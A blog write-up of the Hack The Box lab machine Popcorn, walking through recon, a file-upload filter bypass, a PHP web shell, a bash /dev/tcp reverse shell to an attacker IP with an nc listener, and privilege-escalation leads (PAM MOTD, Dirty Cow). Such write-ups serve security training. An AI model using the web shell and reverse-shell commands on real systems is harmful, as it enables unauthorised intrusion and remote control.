Home htb popcorn
Post
Cancel

htb popcorn

By Yuchao
Posted 2021-03-15 Updated 2022-03-29 1 min read

Recon

nmap

1
2

nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.6
nmap -p 22,80 -sC -sV -oA scans/tcpscripts 10.10.10.6
  • OpenSSH 5.1p1, Apache httpd 2.2.12 —> older than Ubuntu Trusty 14.04 —> Karmic (9.10)

Directory discovery

1
2

# directory discover
gobuster dir -u http://10.10.10.6 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o scans/gobuster-root-med -t 40
  • get the path: /test (Status: 200) /index (Status: 200) /torrent (Status: 301) /rename (Status: 301)
  • show a PHP info page.
  • file_uploads is set to ON
  • may vulnerable to Local File Inclusion.(LFI)
  • /torrent can upload image as screen shot
  • and the picture is saved at http://10.10.10.6/torrent/upload/

upload webshell

manipulate php to bypass picture filters

    1. file extension (the server did not have check this)
    1. Content-Type header (this filter works on the server)
    1. magic bytes (did not work)

so just change the http header, add the php code before a png content in Burpsuite.

1

<?php system($_REQUEST["cmd"]);?>

upload

cmd.php seems to be rename as its hash value, as 0ba973670d943861fb9453eecefd3bf7d3054713.php.

execute

curl http://10.10.10.6/torrent/upload/0ba973670d943861fb9453eecefd3bf7d3054713.php?cmd=id

reverse shell

webshell

1

curl http://10.10.10.6/torrent/upload/0ba973670d943861fb9453eecefd3bf7d3054713.php --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.14/443 0>&1'"

attacker

1

nc -lnvp 443

upgrade the shell

1
2
3
4

python -c 'import pty;pty.spawn("bash")'
^Z
stty raw -echo
fg

privesc

Method 1: Linux PAM vulnerability

show the programs use PAM

1
2
3

$ ls /etc/pam.d 
chfn common-account common-session lightdm login passwd runuser sshd  su-l chpasswd  common-auth common-session-noninteractive lightdm-autologin newusers polkit-1 runuser-l su
chsh common-password  cron lightdm-greeter other ppp samba sudo

The pam modules directory. Can be configured to the programs above

1

/usr/lib/x86_64-linux-gnu/security

at users file find . -type f -ls /.cache/motd.legal-displayed` looks interesting.

  • Googling for “motd.legal-displayed privesc”
  • https://www.exploit-db.com/exploits/14339
  • Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation
  • PAM will create .cache/motd.legal-displayed when login.
  • https://askubuntu.com/questions/256020/how-can-i-stop-the-automatic-creation-of-cache-motd-legal-displayed-file
  • sshd use pam to authenticate, so we need to ssh to the box.(as www-data)

Method 2: Dirty Cow

sec
htb pam dirtycow
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents